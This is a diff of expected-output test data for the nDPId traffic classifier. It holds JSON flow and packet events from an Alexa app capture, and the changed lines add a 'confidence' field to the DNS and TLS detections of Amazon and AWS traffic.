-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1490976041866,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1490976041866,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0nZAAEARuxesECoBrBAq2AA1U48AUSKClqOBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAOQAENu8Yug=="}
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976041866,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.186"}}
+00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976041866,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.186"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041870,"flow_last_seen":1490976041870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976041870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1490976041870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976041870,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YDpAAEAGs\/CsECrYNu8YuoTjAbvEzS6RAAAAAKAC\/\/9XzwAAAgQFtAQCCAoA9k6rAAAAAAEDAwg="}
 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1490976041938,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1490976041938,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90nlAAEARurysECoBrBAq2AA1y20AqYS4a+qBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABMAAoDd3d3A2NkbsAQwCwABQABAAAA+AAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAgABDRV0djAQgABAAEAAAAIAAQ0VdHFwEIAAQABAAAACAAENFXRj8BCAAEAAQAAAAgABDRV0Xo="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976041938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976041938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041942,"flow_last_seen":1490976041942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976041942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1490976041942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976041942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BJdAAEAGWQ+sECrYNFXR2NSLAbvD9kolAAAAAKAC\/\/823gAAAgQFtAQCCAoA9k6yAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1490976041952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976041952,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwusBAAOcGsnU27xi6rBAq2AG7hOPN4I6FxM0uknASH\/5nFQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1490976041953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976041953,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYDtAAEAGtAOsECrYNu8YuoTjAbvEzS6SzeCOhlAQAVexhgAA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041961,"flow_last_seen":1490976041961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976041961,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1490976041961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976041961,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8261AAEAGgfisECrYNFXR2NSMAbsYT5UZAAAAAKAC\/\/+XjgAAAgQFtAQCCAoA9k60AAAAAAEDAwg="}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1490976041989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976041989,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iuwz0jww\/ZKJqAScSDA4QAAAgQFtAQCCAptm51vAPZOsgEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1490976041995,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976041995,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0BJhAAEAGWRasECrYNFXR2NSLAbvD9komsM9I8YAQAVdfcwAAAQEICgD2Trdtm51v"}
-00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976042054,"flow_last_seen":1490976042054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976042054,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1490976042054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976042054,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AfNAAEAGW7OsECrYNFXR2NSNAbumNE9OAAAAAKAC\/\/9PagAAAgQFtAQCCAoA9k69AAAAAAEDAwg="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1490976042056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976042056,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iw+cfkHGE+VGqAScSB8QwAAAgQFtAQCCAps\/wWhAPZOtAEDAwg="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1490976042057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976042057,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0265AAEAGgf+sECrYNFXR2NSMAbsYT5UaPnH5CIAQAVca0QAAAQEICgD2Tr1s\/wWh"}
-00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
+00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01380{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1490976042099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976042099,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71I2zekUSpjRPT6AScSDSoAAAAgQFtAQCCAptF6XzAPZOvQEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1490976042101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1490976042101,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0AfRAAEAGW7qsECrYNFXR2NSNAbumNE9Ps3pFE4AQAVdxMgAAAQEICgD2TsJtF6Xz"}
-00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}}
